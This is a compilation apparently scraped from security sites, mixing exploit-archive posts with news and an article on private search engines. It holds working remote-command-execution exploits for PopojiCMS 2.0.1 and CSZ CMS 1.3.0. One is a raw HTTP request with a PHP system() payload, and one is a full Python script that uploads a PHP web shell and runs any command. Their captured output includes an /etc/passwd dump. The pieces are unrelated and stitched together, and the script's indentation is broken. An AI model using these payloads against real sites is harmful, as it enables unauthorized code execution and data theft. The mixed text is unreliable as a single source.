PopojiCMS version 2.0.1 suffers from a remote command execution vulnerability.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

PopojiCMS 2.0.1 Remote Command Execution

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

CSZ CMS 1.3.0 Remote Command Execution

Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.

Affected Resources

*   Frhed 1.6.0 version.

Description

INCIBE has coordinated the publication of one vulnerabilitiy that affects Frhed, a binary file editor for Windows, which has been discovered by Rafael Pedrero.

This vulnerabilitiy has been assigned the following code, CVSS v3.1 base score, CVSS vector string, and CWE vulnerability type:

*   CVE-2023-4590: CVSS v3.1: 7.3 | CVSS: AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H | CWE-119.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-4590**: buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.

CVE-2023-4590: Buffer Overflow vulnerability in Frhed

What you look for online is up to you—just make sure no one else is taking a peek.

When it comes to looking something up on the web, most of us default to “googling” it—Google's search engine has become so dominant that it's now a verb, in the same way that Photoshop is. But using Google for your searches comes with a privacy trade-off.

Google's business is, of course, based on advertising, and every search you make feeds into the profile of you that it uses to target the ads you see around the web. While Google isn't telling marketing firms what searches you're running, it is using those queries to build up a picture of you that ads can be sold against. As such, Google can be a real snoop about collecting all your data and using it to personalize your ads and the search results you get.

There are ways to increase your privacy on Google’s platforms, like using privacy-focused browsers, using privacy-focused alternatives to Google Maps, auto-deleting your web history after a certain time period, or simply limiting the amount of data the company collects in the first place, by opting out of features like web-based email and location awareness. (And you should know that using your browser's incognito mode isn’t as sneaky as you think it is.) If you're serious about getting off the data collection grid, there’s a bevy of other privacy-focused search options at your disposal. So if you want to use a search engine that doesn't keep track of your queries, serve your data to advertisers, or change your search results based on what it thinks you’ll like, you’ve got some options.

DuckDuckGo

DuckDuckGo is simple, secure, and private.

DuckDuckGo via David Nield

The granddaddy of Google alternatives, DuckDuckGo has made private search its raison d'être for more than 15 years. The service is a little harder to recommend these days, after a kerfuffle in 2022 where the company was caught in an apparent partnership with Microsoft that allowed the tech behemoth’s tracking scripts to run unimpeded on the DuckDuckGo browser. After outcry from privacy advocates, DuckDuckGo walked back that stance a few months later, and it now says it does indeed block Microsoft’s trackers.

If you can move past that particular ugly duckling, the service is still far more private than Google. DuckDuckGo says it collates information in search results from over 400 sources. It doesn’t draw from Google, but it does pull from places like Bing and Wikipedia. What it doesn’t do is personalize search results based on data it collects from users. Like Google, DuckDuckGo displays ads, but they’re not tailored to what it thinks you’ll like based on your search history.

DuckDuckGo can be installed into just about any browser via a browser extension. It also has a full browser available on desktop for Mac and Windows. There are also mobile apps on both iOS and Android that work as browsers while incorporating DuckDuckGo’s search engine.

On the browser and app alike, the service automatically tracks and blocks all the data-scraping efforts from the websites you visit. Press the shield button in the browser bar to see what sites have tried to collect your data or track your travels across the web. Another feature blocks trackers and data requests in other apps on your phone. DuckDuckGo says it can’t block certain scripts and trackers on the websites that run them (like Facebook, for example), but tapping that little button quickly lets you know what’s being blocked and what’s not.

Brave Search

Brave isn't going to keep track of what you're looking for.

Brave via David Nield

The privacy-focused browser extension provider Brave has its own dedicated search engine. The company launched the service in 2021. Like the other services on this list, Brave says its Search product doesn’t track your searches or log your data. It's impressively comprehensive—as much for its security and privacy as for the results you get.

Simply put, no logs of your queries are kept by the search engine. While that might make for a slightly less convenient user experience—Google might automatically know you're more interested in the Miami Dolphins than actual dolphins, for instance—it does mean that you can search without worrying that you're going to see any related advertising.

"It's impossible for us to share, sell, or lose your data, because we don’t collect it in the first place," says Brave. While the service might eventually become ad-supported, those adverts won't know anything about you or what you've been looking for on the web, making it distinctly different from Google's offering.

Brave also has a service in beta called Goggles that lets users customize their own page rankings to make search results more relevant to each person. It can have some issues, such as being a bit complicated and also could lead to people creating their own little filter bubbles—inadvertently or otherwise.

You can download the Brave Browser for desktop, or get its mobile apps on Android and iOS. You can also access the Brave search engine from any web browser and any device. You don't have to use the Brave browser to use it.

Kagi

The prospect of paying for a search engine might seem odd if you’re used to unlimited Googling on a whim. But that’s exactly the service Kagi is offering.

If you’re willing to pay for yet another subscription, Kagi is a premium search experience worth trying. You can customize how search results are displayed and how links are organized and accessed. There’s also a robust array of search operators and keyboard shortcuts to use. Kagi’s privacy policy is similar to the other services on this list, in that it doesn’t track your online movements or collect your data. It also doesn’t show ads, which feels like such a relief in the era of endless pop ups and sponsored posts.

The pricing plan is simple. There is a free tier, which allots you 100 searches per month before cutting you off. From there you can pay $5 per month for 500 searches, or get unlimited searches $10 a month. All plans, even the free ones, require you to make an account.

Kagi is available as a browser extension for Firefox, Google Chrome, and Safari. Kagi’s Orion browser is available on the Mac, and it also has an iOS app.

Startpage

Want Google’s search results but without Google? Startpage may be the answer. The company serves up Google’s search results without you being tracked. “Startpage submits your query to Google anonymously, then returns Google results to you privately,” the company says on its website. It adds that Google “never sees you and does not know who made the request”.

Startpage, which was founded in the Netherlands in 2006, says that it doesn’t store people’s personal data or search history, and your IP address is removed by its servers. The company also says it blocks price trackers and prevents advertisers from showing you ads based on your online history. (It does show ads from Google’s search results). Its search results also let you click to open an anonymous view of them, which it claims works like a VPN.

The experience isn’t exactly the same as Google search, but the results are. For instance, if you search for something in the news—maybe Elon Musk, if you must—Google will show you a carousel of the latest news stories before its search results. Google also includes Musk’s latest tweets, videos of him, and photos. When you’re using Startpage, the clutter is removed and you just get URLs.

Mojeek

Mojeek doesn’t use search results from other search engines. Instead, the British search engine, which launched in 2006, is building its own index of the web. It’s doing this in the same way as Google and Bing. The company’s crawlers, which trawl the web and collect information about pages, have indexed more than six billion web pages.

This crawling isn’t as extensive as Google’s—back in 2013 Google said it was indexing 30 trillion web pages, 100 billion times a month—but Mojeek says its approach means it is fully in control of the search results it shows. The company argues there should be alternative indexes to those controlled by Big Tech. “Making and altering our own algorithm from scratch to display high quality and unbiased results is essential,” the company said in 2018.

But that’s not the only difference to Google. Mojeek also says it doesn’t track people. The search results you see are based entirely on the words that you type in, the company says, and it doesn’t collect IP addresses, search history or the clicks that you make.

Limiting Google

You can break the connection between Google Chrome and your Google account.

Google via David Nield

It's worth bearing in mind that if you're using Google Chrome and you're signed into Google, you may well be syncing your DuckDuckGo or Brave searches back to your Google account. Your Google web history and your Chrome browsing history (if you're signed into Google) will match up most of the time, because Google keeps them in sync by default, partly to make it easier to use Google across multiple devices.

To stop this from happening in Chrome, click the three dots in the top right-hand corner, then choose **Settings**. If you see that you're signed into your Google account at the very top, click **Turn off**—this will break the connection between Google and your browser, and you'll be given the option to delete all the data that's stored locally on your device (including your browsing history, bookmarks, and stored passwords).

Perhaps an easier option is to simply switch to another browser altogether—as we've already mentioned, Brave, DuckDuckGo, and Kagi all have them. Other good cross-platform alternatives to Chrome are Microsoft Edge, Mozilla Firefox, Opera and Safari from Apple—but whichever one you switch to, be sure to check out the settings for deleting your browsing history as you go. (All of these browsers have simple-to-use options for this.)

Whichever browser you decide to use, opening up a private or incognito window while you're searching will prevent those searches from being logged inside the browser—as soon as you close the window, the search is gone forever. Bear in mind that these modes don't necessarily stop online companies from tracking your queries though. (If you sign into your Google account while in private mode, Google will still be able to track you.)

If you can't bring yourself to be parted from the search results that Google serves up, you can at least make sure that they're not remembered for too long. Open up your Google account settings page on the web, then click **Data & Privacy** and scroll down to **Web & App Activity.** You can choose either **Manage activity** to remove history and searches manually, or select the **Auto-delete** option to have this data wiped automatically once it's been stored for a certain amount of time.

Private and Secure Web Search Engines: DuckDuckGo, Brave, Kagi, Startpage

Gentoo Linux Security Advisory 202311-10 - Multiple vulnerabilities have been discovered in RenderDoc, the worst of which leads to remote code execution. Versions greater than or equal to 1.27 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: RenderDoc: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #908031  
       ID: 202311-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in RenderDoc, the worst of  
which leads to remote code execution.

Background  
=========  
RenderDoc is a free MIT licensed stand-alone graphics debugger that  
allows quick and easy single-frame capture and detailed introspection of  
any application using Vulkan, D3D11, OpenGL & OpenGL ES or D3D12 across  
Windows, Linux, Android, or Nintendo Switch™.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-gfx/renderdoc  < 1.27        >= 1.27

Description  
==========  
Multiple vulnerabilities have been discovered in GRUB. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All RenderDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/renderdoc-1.27"

References  
=========  
[ 1 ] CVE-2023-33863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33863  
[ 2 ] CVE-2023-33864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33864  
[ 3 ] CVE-2023-33865  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33865

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-10

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called HrServ in what’s suspected to be an advanced persistent threat (APT) attack.
The web shell, a dynamic-link library (DLL) named “hrserv.dll,” exhibits “sophisticated features such as custom encoding methods for client communication and in-memory execution,” Kaspersky security researcher Mert

Cyber Attack / Threat Intelligence

An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called **HrServ** in what's suspected to be an advanced persistent threat (APT) attack.

The web shell, a dynamic-link library (DLL) named "hrserv.dll," exhibits "sophisticated features such as custom encoding methods for client communication and in-memory execution," Kaspersky security researcher Mert Degirmenci said in an analysis published this week.

The Russian cybersecurity firm said it identified variants of the malware dating all the way back to early 2021 based on the compilation timestamps of these artifacts.

Web shells are typically malicious tools that provide remote control over a compromised server. Once uploaded, it allows threat actors to carry out a range of post-exploitation activities, including data theft, server monitoring, and lateral advancement within the network.

The attack chain involves the PAExec remote administration tool, an alternative to PsExec that's used as a launchpad to create a scheduled task that masquerades as a Microsoft update ("MicrosoftsUpdate"), which subsequently is configured to execute a Windows batch script ("JKNLA.bat").

The Batch script accepts as an argument the absolute path to a DLL file ("hrserv.dll") that's then executed as a service to initiate an HTTP server that's capable of parsing incoming HTTP requests for follow-on actions.

"Based on the type and information within an HTTP request, specific functions are activated," Degirmenci said, adding "the GET parameters used in the hrserv.dll file, which is used to mimic Google services, include 'hl.'"

This is likely an attempt by the threat actor to blend these rogue requests in network traffic and make it a lot more challenging to distinguish malicious activity from benign events.

Embedded within those HTTP GET and POST requests is a parameter called cp, whose value – ranging from 0 to 7 – determines the next course of action. This includes spawning new threads, creating files with arbitrary data written to them, reading files, and accessing Outlook Web App HTML data.

If the value of cp in the POST request equals "6," it triggers code execution by parsing the encoded data and copying it into the memory, following which a new thread is created and the process enters a sleep state.

The web shell is also capable of activating the execution of a stealthy "multifunctional implant" in memory that's responsible for erasing the forensic trail by deleting the "MicrosoftsUpdate" job as well as the initial DLL and batch files.

The threat actor behind the web shell is currently not known, but the presence of several typos in the source code indicates that the malware author is not a native English speaker.

"Notably, the web shell and memory implant use different strings for specific conditions," Degirmenci concluded. "In addition, the memory implant features a meticulously crafted help message."

"Considering these factors, the malware's characteristics are more consistent with financially motivated malicious activity. However, its operational methodology exhibits similarities with APT behavior."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New 'HrServ.dll' Web Shell Detected in APT Attack Targeting Afghan Government

Researchers have found several weaknesses in the fingerprint authentication for Windows Hello on popular laptops.

Researchers have found several weaknesses in Windows Hello fingerprint authentication on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops.

Microsoft’s Offensive Research and Security Engineering (MORSE) asked the researchers to evaluate the security of the top three fingerprint sensors embedded in laptops. They found vulnerabilities that allowed them to completely bypass Windows Hello authentication on all three.

If you like to read the full technical details, we happily refer you to the Blackwing researcher’s blog: A TOUCH OF PWN – PART I. For a less technical summary, carry on.

First but foremost, it’s important to know that for these vulnerabilities to be exploitable, fingerprint authentication needs to be set up on the target laptop. Imagine the type of disaster if that wasn’t true.

The three sensors the researchers looked at were all of the “match on chip” type. This means that a separate chip stores the biometric credentials (in this case the fingerprints), making it almost impossible to hack into.

The communication between the sensor and the laptop is done over a secure channel, set up through the Secure Device Connection Protocol (SDCP) created by Microsoft.

SDCP aims to answer three questions about the sensor:

1.  How can the laptop be certain it’s talking to a trusted sensor and not a malicious one?
2.  How can the lapop be certain the sensor hasn’t been compromised?
3.  How is the raw input from the sensor protected?
    *   The input has to be authenticated.
    *   The input is fresh and can’t be re-playable.

So, what could go wrong?

The researchers were still able to spoof the communication between sensor and laptops. They were able to fool the the laptops using a USB device which pretended to be its sensor, and sent a signal that an authorized user had logged in.

The bypasses are possible because the device manufacturers did not use SDCP to its full potential:

*   The ELAN sensor commonly used in Dell and Microsoft Surface laptops lacks SDCP support and transmits security identifiers in cleartext.
*   Synaptics sensors, used by both Lenovo and Dell, had turned SDCP off by default and used a flawed custom Transport Layer Security (TLS) stack to secure USB communications.
*   The Goodix sensors, also used by both Lenovo and Dell, could be bypassed because they are suitable for Windows and Linux, which does not support SDCP. The host driver sends an unauthenticated configuration packet to the sensor to specify what database to use during sensor initialization.

The recommendation of the researchers to the manufacturers is clear: SDCP is a powerful protocol, but it doesn’t help if it isn’t enabled or when it can be bypassed by using other weak links in your setup.

The fact that three manufacturers were mentioned by name doesn’t mean by any stretch that others have done a better job. It just means the researchers didn’t get round to testing them.

If you, as a user, are worried about anyone being able to get near your laptop with a USB device, you shouldn’t be using fingerprints as an authentication method and disabled.

